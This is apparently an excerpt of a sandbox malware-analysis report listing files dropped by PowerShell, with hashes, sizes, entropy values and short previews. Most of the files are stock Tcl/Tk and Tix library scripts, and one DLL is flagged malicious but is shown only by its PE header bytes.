                                                                                                                                                                                                                      SHA1:061F928E3BC5A823B4E1C321383E48928EE5F30C
                                                                                                                                                                                                                      SHA-256:77722943E8B234FDABA9B85206A3188913FC1D423FAF45CBFF87D3164EE63E52
                                                                                                                                                                                                                      SHA-512:C3844717D0CDC212060B31263EEDCE157196A701F897DBFC10A12C4B13D45EE755E8B750AD00C3FF66319D8E4591F3D8A4F44B66592956B2B0F9E33B3B8BAE07
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: WmDefault.fsc,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#..#....proc tixPref:InitFontSet:WmDefault {} { .. global tixOption.... package require wm_default.. if {1 || ![info exists ::wm_default::wm]} {...wm_default::setup...wm_default::addoptions.. }.... set tixOption(font) .$::wm_default::system_font.. set tixOption(bold_font) [concat $::wm_default::system_font bold].. set tixOption(menu_font) $::wm_default::menu_font .. set tixOption(italic_font) [concat $::wm_default::system_font italic].. set tixOption(fixed_font) $::wm_default::fixed_font.. set tixOption(border1) $::wm_default::borderwidth....}....proc tixPref:SetFontSet:WmDefault {} { .. global tixOption.... package require wm_default.. if {1 || ![info exists ::wm_default::wm]} {...wm_default::setup...wm_default::addoptions.. }.... set pri $tixOption(prioLevel).... set tixOpt
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3597
                                                                                                                                                                                                                      Entropy (8bit):4.788671813521213
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:Ft+jv/XTfjLpmUXLzzPJpGzVAqi1dDv59dbInyzGyNjPO7Mq:XUFBzjJpfRdDvXdXzGyxPdq
                                                                                                                                                                                                                      MD5:5D362C110E1EA37EAADFBA38C5EA3F90
                                                                                                                                                                                                                      SHA1:E8B0E219EECD2FB05C2CC58DE2135C632D585FD2
                                                                                                                                                                                                                      SHA-256:3A639975EDD8A50C6D9AD0DC1FD50C2CB9213F1F8D2879BA661C6A9CE78B3DD3
                                                                                                                                                                                                                      SHA-512:BCDDF0D35176BBE77BAAB4CF3261FBA187630B87A56B8C5A756C11B3DAE221453B8E5600DD6A79D3442259C4D4CE1E9ADAA847BF9F52049323B6BE6930D5D818
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: python; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: WmDefault.py,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#......"""One of the bad things about Tk/Tkinter is that it does not pick up..the current color and font scheme from the prevailing CDE/KDE/GNOME/Windows ..window manager scheme.....One of the good things about Tk/Tkinter is that it is not tied to one..particular widget set so it could pick up the current color and font scheme ..from the prevailing CDE/KDE/GNOME/Windows window manager scheme.....The WmDefault package is for making Tk/Tkinter applications use the ..prevailing CDE/KDE/GNOME/Windows scheme. It tries to find the files..and/or settings that the current window manager is using, and then..sets the Tk options database accordingly.....Download the latest version of wm_default from http://tix.sourceforge.net..either as a part of the standard Tix distribution, or as a part of the..Tix Applications: http://tix.sourceforge.net/Tide. wm_
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34898
                                                                                                                                                                                                                      Entropy (8bit):5.08405237830242
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:a/vtX29Zm3d9yU6E361rKEMliu+tRhD34sAyRHdIWxIZIWxna/ba/4xTvbh:a/x2/TAy3LF
                                                                                                                                                                                                                      MD5:2D8E5B353F6B19A171AF6774ED9376A6
                                                                                                                                                                                                                      SHA1:C1B03EC81A7BCD5B240F63DE57661899DDAD9AEC
                                                                                                                                                                                                                      SHA-256:186DE6B0A494B36AE97BA9237F9FFA03F38F670E855BA0E72BF0EF192E52EBE4
                                                                                                                                                                                                                      SHA-512:79FC517171FA5067EE14357E85CCBEDF1D268EBEE63AF87F55C5B365D8C2A7E98F322ED96DD1864669C481F8252687B3C52A49194015ABB3A98902487208050D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#..#.$Id: WmDefault.tcl,v 1.7 2008/03/17 22:47:00 hobbs Exp $..#..#.Description: Package for making Tk apps use the CDE/KDE/Gnome/Windows scheme..#.Prefix: wm_default::..#.Url: http://tix.sourceforge.net/Tixapps/..#..# Usage:..#.It should be sufficient at the beginning of a wish app to simply:..#..#. package require wm_default..#. wm_default::setup..#. wm_default::addoptions..#..# .wm_default::setup takes an optional argument - the scheme if already..#.known, one of: windows gnome kde1 kde2 cde kde..# .wm_default::addoptions takes optional arguments - pairs of variables..#.and values to override the kde settings. e.g. ..#..wm_default::addoptions -background blue..#..# Description:..# package for making Tk apps look nice under CDE or KDE or Windows..#..#.The stuff below attempts to use the options database and the..#.various files under ~/.dt, $DTHOME, and /usr/dt to figure out..#.the user's c
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4466
                                                                                                                                                                                                                      Entropy (8bit):5.027161509609237
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:mjv/XTfjLp5ICtKPHQzcWiqnJpLjhKgGJjVx9YTG4UjpnyKl15witkft3Ut:8FyCk/QzcDkJpdG1Vaspbwitkit
                                                                                                                                                                                                                      MD5:E659C759ECDF4B5728636E2F46E54686
                                                                                                                                                                                                                      SHA1:FBC38344B82AED8AD117CA9CF2017A15AEC80D41
                                                                                                                                                                                                                      SHA-256:1800C8EC457FEAEF748762C8059251E5C8F160F004B7A83E1F9A50DA5B68E6B3
                                                                                                                                                                                                                      SHA-512:5DCD8950E706501D2BA57FBF2D1FB29A48EF113B36D236204AA426002C076205B9AA1CA17E60958D58D5E732A4A35E75BE0CB2AD0E9AACBA742C735F9BC5B10B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:One of the bad things about Tk/Tkinter is that it does not pick up..the current color and font scheme from the prevailing CDE/KDE/GNOME/Windows ..window manager scheme.....One of the good things about Tk/Tkinter is that it is not tied to one..particular widget set so it could pick up the current color and font scheme ..from the prevailing CDE/KDE/GNOME/Windows window manager scheme.....The WmDefault package is for making Tk/Tkinter applications use the ..prevailing CDE/KDE/GNOME/Windows scheme. It tries to find the files..and/or settings that the current window manager is using, and then..sets the Tk options database accordingly (plus a few other things as well). ......DOWNLOAD..--------....Download the latest version of wm_default from http://tix.sourceforge.net..either as a part of the standard Tix distribution, or as a part of the..Tix Applications: http://tix.sourceforge.net/Tide. wm_default does not..require Tix, but is Tix enabled.......USAGE:..------....For Tix versions 8.1.2 an
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):271
                                                                                                                                                                                                                      Entropy (8bit):5.130417916199118
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SbASJU8xNIK9dMvGLGLJlMGxNH/KsBtbFo+Qs1mMN22ZMQ9+ixQ+pBjcrn:aPxNnOuyLJHx5/xt5/B0zsQ+pBE
                                                                                                                                                                                                                      MD5:0192FD8975822C9DB3AA9ED73D009256
                                                                                                                                                                                                                      SHA1:3325726CCBDC9A63F1398B7C314A3FF75AC54165
                                                                                                                                                                                                                      SHA-256:1C9E2E43331A73B84FEE2A7BE29EDA696DDB650412BA62A11EF97BA53B021A64
                                                                                                                                                                                                                      SHA-512:F3794B933103D0617BB4079B1D979648CB368F96C512BA7ECBD5D9BCDD5BB20C92786C0296DFB7D18C3ADDB1A7171179D581AE028A7761F23CE8A99D8FF57F12
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..# Tcl package index file, version 1.0..#..# $Id: pkgIndex.tcl,v 1.2 2002/01/24 09:17:02 idiscovery Exp $..#....package ifneeded wm_default 1.0 [list source [file join $dir WmDefault.tcl]]....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:a /usr/local/bin/tclsh script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10032
                                                                                                                                                                                                                      Entropy (8bit):5.123103247748855
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dv53Tg9T4xk4hJT3CHsbTi1MIGXAaT0Vr3yj8ku:dR3TqT4xk4hJT3Csbu1MIGXAa4VriIku
                                                                                                                                                                                                                      MD5:6CB30BE0E01E6E4D5913654312CEF2CA
                                                                                                                                                                                                                      SHA1:F259C87E8A882BC1A45B6EFAC59FAF43F5D0FAC2
                                                                                                                                                                                                                      SHA-256:9C87861571BA882CECABB5A00CB771B3ED3CD2DD87851C2BC26C9A05ABBA6ED1
                                                                                                                                                                                                                      SHA-512:862E3CA6654FBE30B778B4F383F99838BF82AA78623BA20755430C7AEDEC944A61C58090C8781D7783E829C2C34F2B6C191AA09C9AB9C155A5E2706469E45F01
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/usr/local/bin/tclsh..# Undocumented program. Don't use it...#..# Usage:..# ..# .tixmkpref option name.src > name.tcl..#....proc tixDefOption {classes specs {level \$tixOption(prioLevel)}} {.. global isFont tixOption.... foreach class $classes {...foreach spec $specs {... if [regexp (Font)|(font) $spec] {....if {$isFont} {.... puts "option add *$class$spec $level"....}... } else {....if {!$isFont} {.... set aspec [subst $spec].... puts "option add *$class$spec $level"....}... }...}.. }..}....proc option {classes specs {level \$tixOption(prioLevel)}} {.. tixDefOption $classes $specs $level..}....proc tixInitOptionDatabase {strictTK} {.. global tixOption isFont.... # general stuff, everything gets these defaults unless otherwise specified.. #-------------------------------------------------------------------------.. tixDefOption {""} {{Font...$tixOption(font)}}.. tixDefOption {""} {{font...$tixOption(font)}}.... tixDefOption {""} {{backgr
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):371200
                                                                                                                                                                                                                      Entropy (8bit):5.543969089991363
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:hbxLdD2njmu36uNWvXKRL0l3pDPloPITPinEgPDQtDEVKIg8gVDo:h9L436y6KRLEhPloPITPbgPktDEVKIg6
                                                                                                                                                                                                                      MD5:BB2BC69DD70AA53F51F29944D8D3B040
                                                                                                                                                                                                                      SHA1:1D40CC0DC683656AD9E0B93CAAC1A971795DBF77
                                                                                                                                                                                                                      SHA-256:05AB699EFB499029B008D85EC7DDAA054CF8E70F8643129F5658E8E9FD7DD95F
                                                                                                                                                                                                                      SHA-512:9F5E0BD983AC8C6CFD2EFB7D4F74F5343DDD3706416A3BBC91BD261D49D1BE6859A900A5D29E00A4C6DF930FA36D1D7DD128B5E37E4FE618DD47E721FD4A6C1B
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........."..q..q..q..=q..q|..p..q|..p..q|..p..q|..p..q/..p..q..q..qr..p..qr..p..qr..p..qRich..q................PE..d...v,.c.........." ...!.J...f......|P..............................................6\....`.....................................................................................P....d...............................c..@............`...............................text....I.......J.................. ..`.rdata..&:...`...<...N..............@..@.data...H...........................@....pdata...............|..............@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:current ar archive
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34156
                                                                                                                                                                                                                      Entropy (8bit):5.087276435499958
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:jYVEVpQ+3/CfURqGWWSsV/3fOqNiavAUHEgWAV3XGE6q+DB1UO2Tt//a9u0rE/LB:bV/FAEFcu0rayTaCREKdFupYYul8t
                                                                                                                                                                                                                      MD5:2023CDCC97AB82AA6FB757D4629F076C
                                                                                                                                                                                                                      SHA1:96E6204F9A99E6AA132549872E51F4E3ECDEEBA2
                                                                                                                                                                                                                      SHA-256:A82C68F505ED22D399319ACD9DD2BE9522F86314C8EB09B460D94C3BEF9B154B
                                                                                                                                                                                                                      SHA-512:9164BDE413A38782012420CD850B76776F0D71AF7EC0433728B368B0D2BFD1073423439BB03EFC29393051BDFD4D0A4FA7E37A1DC8FA7F3D4009D65A905383DE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:!<arch>./ -1 0 8044 `.......?l..A...B...D...D...Ef..Ef..E...E...Kj..Kj..vH..vH..S...S...VF..VF..V...V...W...W...Xp..Xp..X...X...YL..YL..Z"..Z"..Y...Y...Z...Z...[...[...D...D...^...^...J...J...`...`...t...t...|t..|t..........w...w...}...}...........T*..T*..}H..}H..~...~...IH..IH..I...I...F...F...G...G...H...H...G...G...Hh..Hh..J"..J"..J...J...G...G...cx..cx..d...d...c...c...e...e...fv..fv..M...M...Nn..Nn..N...N...OR..OR..O...O...P>..P>..LF..LF..L...L...Q...Q...P...P...Q ..Q ..R...R...M ..M ..M...M...R...R...Rr..Rr..SN..SN..gL..gL..f...f...e2..e2..f...f..._..._...dZ..dZ..g...g...h...h...mL..mL..lz..lz..i...i...l...l...jR..jR..in..in..l...l...h ..h ..h...h...k...k...k0..k0..j...j...m...m...n...n...n...n...n...n...[l..[l...h...............6..o...o...r...r...p...p...t...t...t"..t"..q...q...q...q...q...q...r`..r`..s@..s@..s...s...\F..\F..\...\...U...U...]...]...^Z..^Z..`...`...aV..aV..|...|...T...T...Ul..Ul..U...U...]|..]|..`...`...b...b...ul..ul
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8806
                                                                                                                                                                                                                      Entropy (8bit):4.863085192885279
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:RpwYLapGk1BlM4UBIHpJFVUXUziMJ5Kxyk55qxUr7Vdk5vNR:RuYfvMdOXyj+01f
                                                                                                                                                                                                                      MD5:C5E9A2E32AE83A79DF422D1145B692DF
                                                                                                                                                                                                                      SHA1:08350F930FB97A95970122920C91FB9CED8329E9
                                                                                                                                                                                                                      SHA-256:8822365EE279BEBF7A36CFDEDBA1114762F894781F4635170CC5D85FF5B17923
                                                                                                                                                                                                                      SHA-512:71420E15A3D63329560074F6FFAD42CB464401284BC29D0DC8E34D83F8F77079F26BB4C5703E656A48E6931C3DBF6B873756FB212D0860483E0301B29EDE1212
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# bgerror.tcl --..#..#.Implementation of the bgerror procedure. It posts a dialog box with..#.the error message and gives the user a chance to see a more detailed..#.stack trace, and possible do something more interesting with that..#.trace (like save it to a log). This is adapted from work done by..#.Donal K. Fellows...#..# Copyright (c) 1998-2000 by Ajuba Solutions...# Copyright (c) 2007 by ActiveState Software Inc...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::dialog::error {.. namespace import -force ::tk::msgcat::*.. namespace export bgerror.. option add *ErrorDialog.function.text [mc "Save To Log"] \...widgetDefault.. option add *ErrorDialog.function.command [namespace code SaveToLog].. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault.. if {[tk windowingsystem] eq "aqua"} {...option add *ErrorDialog*background systemAlertBackgroundActi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21612
                                                                                                                                                                                                                      Entropy (8bit):4.947590677310969
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Tv7cBCAsj9oqlFFSsB3VfRt+lMpWaNwJgzCHarc6gAsj9oqlFFSsB3VlRtYlMpBz:TvweHBBTfIZxHBnZWqbJPBFIaVlCj26+
                                                                                                                                                                                                                      MD5:AEB53F7F1506CDFDFE557F54A76060CE
                                                                                                                                                                                                                      SHA1:EBB3666EE444B91A0D335DA19C8333F73B71933B
                                                                                                                                                                                                                      SHA-256:1F5DD8D81B26F16E772E92FD2A22ACCB785004D0ED3447E54F87005D9C6A07A5
                                                                                                                                                                                                                      SHA-512:ACDAD4DF988DF6B2290FC9622E8EACCC31787FECDC98DCCA38519CB762339D4D3FB344AE504B8C7918D6F414F4AD05D15E828DF7F7F68F363BEC54B11C9B7C43
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# button.tcl --..#..# This file defines the default bindings for Tk label, button,..# checkbutton, and radiobutton widgets and provides procedures..# that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 2002 ActiveState Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for buttons...#-------------------------------------------------------------------------....if {[tk windowingsystem] eq "aqua"} {.... bind Radiobutton <Enter> {...tk::ButtonEnter %W.. }.. bind Radiobutton <1> {...tk::ButtonDown %W.. }.. bind Radiobutton <ButtonRelease-1> {...tk::ButtonUp %W.. }.. bind Checkbutton <Enter> {...tk::ButtonEnter %W
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9960
                                                                                                                                                                                                                      Entropy (8bit):4.802555950168837
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:HKOdkMpU9YUp8UIhMYYicln9Die0luVZat3pIp5Y3sF1P8Bg8p6trIOzvKsOiCLU:HyMm9J8wPx70luex4C8Fygq6tohef+0J
                                                                                                                                                                                                                      MD5:818E4F0112931F12B4FAC4CAD262814C
                                                                                                                                                                                                                      SHA1:AC7060DF952F9DB52C3687B8F5E6AA4ADF06992E
                                                                                                                                                                                                                      SHA-256:35B208E8570B0D1E0CA1C911D4FE02EE3B0CFE5667CF1BDEC006CF9D043122BA
                                                                                                                                                                                                                      SHA-512:0C535B6621BC83412B7A64CB6AC2BA526B8E49BB5F6BC5EBEDA41D223D68DEB031DB9C8A31F8671BC5F327D720942E7FDAE3328334B0B550AC991191F96909D6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# choosedir.tcl --..#..#.Choose directory dialog implementation for Unix/Mac...#..# Copyright (c) 1998-2000 by Scriptics Corporation...# All rights reserved.....# Make sure the tk::dialog namespace, in which all dialogs should live, exists..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}....# Make the chooseDir namespace inside the dialog namespace..namespace eval ::tk::dialog::file::chooseDir {.. namespace import -force ::tk::msgcat::*..}....# ::tk::dialog::file::chooseDir:: --..#..#.Implements the TK directory selection dialog...#..# Arguments:..#.args..Options parsed by the procedure...#..proc ::tk::dialog::file::chooseDir:: {args} {.. variable ::tk::Priv.. set dataName __tk_choosedir.. upvar ::tk::dialog::file::$dataName data.. Config $dataName $args.... if {$data(-parent) eq "."} {.. set w .$dataName.. } else {.. set w $data(-parent).$dataName.. }.... # (re)create the dialog box if necessary.. #.. if {![winfo exis
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22103
                                                                                                                                                                                                                      Entropy (8bit):5.03166227244502
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:lJGidpe3JQDUd6hgp6EQstzQf+a9DPbS43/H//cO802UeeVnZmM6BA0kyVJv9Qpu:Gep6JCwQDPbLPaRCzTdMAe
                                                                                                                                                                                                                      MD5:AD86E0265C307348A16E9E4B64D8F235
                                                                                                                                                                                                                      SHA1:66EC6726DF997EE6096F642EBBBDB8C3201BA571
                                                                                                                                                                                                                      SHA-256:D210DCFA9ADB4C23E44EBF744839158CAB4E21EACF9483C6BA91BA6EC4660EB8
                                                                                                                                                                                                                      SHA-512:A0C9DF815FE54C26EED69C84B29FD829EB1B7E43D2787E98C71D091607226532F6F0E9213E83FF8263FCB6DA892178029D5EF475FD46D22F9BB8AB31B87BF438
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# clrpick.tcl --..#..#.Color selection dialog for platforms that do not support a..#.standard color selection dialog...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# ToDo:..#..#.(1): Find out how many free colors are left in the colormap and..#. don't allocate too many colors...#.(2): Implement HSV color selection...#....# Make sure namespaces exist..namespace eval ::tk {}..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::color {.. namespace import ::tk::msgcat::*..}....# ::tk::dialog::color:: --..#..#.Create a color dialog and let the user choose a color. This function..#.should not be called directly. It is called by the tk_chooseColor..#.function when a native color selector widget does not exist..#..proc ::tk::dialog::color:: {args} {.. variable ::tk::Priv.. set dataName __tk__color.. upvar ::tk::dialog::color::$da
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8690
                                                                                                                                                                                                                      Entropy (8bit):5.098389551322902
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:u4R7+/gFw/MEN55fO7eyjt4bjC+gR8e3vwLln/+LVtUw0tXK4jA:u4l+/gFeMI55Xyjt4bjC+gOe3Ih/+LV1
                                                                                                                                                                                                                      MD5:ABF277E4F62423F4345B6AD65640B8C2
                                                                                                                                                                                                                      SHA1:E66A4E37D51C7827C9ACA449A42E0966AACBC8C8
                                                                                                                                                                                                                      SHA-256:C7DA292CCF5F413E599C3491C331FFD58CF273F8477FACB097E6F36CF1F32A08
                                                                                                                                                                                                                      SHA-512:AA9F75D7C5C915B5FCD2F454856D080D186AB9BA149DC139FEAF7F4AC3DC51E6769E138E3B1BE45B3FEC3AE744189DE44DB2B748F0628FF13E4E733B9CD68BD5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# comdlg.tcl --..#..#.Some functions needed for the common dialog boxes. Probably need to go..#.in a different file...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# tclParseConfigSpec --..#..#.Parses a list of "-option value" pairs. If all options and..#.values are legal, the values are stored in..#.$data($option). Otherwise an error message is returned. When..#.an error happens, the data() array may have been partially..#.modified, but all the modified members of the data(0 array are..#.guaranteed to have valid values. This is different than..#.Tk_ConfigureWidget() which does not modify the value of a..#.widget record if any error occurs...#..# Arguments:..#..# w = widget record to modify. Must be the pathname of a widget...#..# specs = {..# {-commandlineswitch resourceName ResourceClass defaultValue verifier}..# {....}..# }..#..# flags
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):33347
                                                                                                                                                                                                                      Entropy (8bit):4.995865221021151
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:jMpwGU6OGEJemVueuR3fitsHI76Su6qKQjGCy1HyOnmTTRV+po2mBh6S5mDjbHqC:jMpdUDGEJpC6+oVeKQPjnD2jVfV/
                                                                                                                                                                                                                      MD5:4CA2E90A125FFD6191D0C5AC6818D18F
                                                                                                                                                                                                                      SHA1:855F10234FA1D65521C2508206EA58DC565E452B
                                                                                                                                                                                                                      SHA-256:A4B21DBF699C20EA5AC334EC109F731BE8EB2B8F9A34CCC2EBE538F4BF8A05F8
                                                                                                                                                                                                                      SHA-512:ED5AE05A7F1D379F8343FF4AD7EF561C5C4D9B7E02399A7281DF8B8930B924B0482FDC5B4E3F90C2214ADA4F87D9A5E64DB2259194C58A2135D969C01BBE64F9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# console.tcl --..#..# This code constructs the console window for an application. It..# can be used by non-unix systems that do not have built-in support..# for shells...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 2007-2008 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# TODO: history - remember partially written command....namespace eval ::tk::console {.. variable blinkTime 500 ; # msecs to blink braced range for.. variable blinkRange 1 ; # enable blinking of the entire braced range.. variable magicKeys 1 ; # enable brace matching and proc/var recognition.. variable maxLines 600 ; # maximum # of lines buffered in console.. variable showMatches 1 ; # show multiple expand matches.. variable useFontchooser [llength [info command ::tk::fontchooser]
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2126
                                                                                                                                                                                                                      Entropy (8bit):4.595286903132209
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:XuSMrhikBBZPAumySOgEdzpCetSQ4+Ge19FEyKUkE8Ak:X3Mr7KySYzwetSQ4+Gs9+yx8r
                                                                                                                                                                                                                      MD5:5D1D24183C2B5873983990E97ADAB929
                                                                                                                                                                                                                      SHA1:1FA23D4EF5C4A095426425AFE833BA8665F4E10B
                                                                                                                                                                                                                      SHA-256:BA3178AFAFCCB3CCCCBD9B0BFA311973BD79C1D143F2EA14A3AF1C6A82F7CCEC
                                                                                                                                                                                                                      SHA-512:6C039CC27276BCAA4083A872C75080FD6F588D08DFB19EF93D5E2528D06531E9E68FF2EE32527E2B6A1D809AFC5AC12A0B5930C7640191825A50033EF914E57C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:This directory contains a collection of programs to demonstrate..the features of the Tk toolkit. The programs are all scripts for.."wish", a windowing shell. If wish has been installed on your path..then you can invoke any of the programs in this directory just..by typing its file name to your command shell under Unix. Otherwise..invoke wish with the file as its first argument, e.g., "wish hello"...The rest of this file contains a brief description of each program...Files with names ending in ".tcl" are procedure packages used by one..or more of the demo programs; they can't be used as programs by..themselves so they aren't described below.....hello -..Creates a single button; if you click on it, a message....is typed and the application terminates.....widget -.Contains a collection of demonstrations of the widgets....currently available in the Tk library. Most of the .tcl....files are scripts for individual demos available through....the "widget" program.....ixset -..A simple Tk
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6830
                                                                                                                                                                                                                      Entropy (8bit):5.410580558312564
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:lO5MV1YNO24k0aZHYVIEaNrj7GHI45XE4uryD2TE025QB9DQVsAMzM2sNgOk6UDn:lOGLYA247aZHYVAf7Opfu429pjNrO8V
                                                                                                                                                                                                                      MD5:84A944D1A3237ED909B265BD6ACB94AD
                                                                                                                                                                                                                      SHA1:979AEC590CEB996D176C4A77F702755BAB1FEDFE
                                                                                                                                                                                                                      SHA-256:15F62112D522570D1BD80AEF38EBD292C3886D0E975F883C1F6EC4DCD315C07A
                                                                                                                                                                                                                      SHA-512:C366F0D84E887900A44CC25891756A2BA2DF564519214AB7A6E4BB7EC52E29743F8C5EB2CCDA83435E76BD8F278FEC44AC59BE0E0C9F028B1B453B38F83A26A0
                                                                                                                                                                                                                      Malicious:false
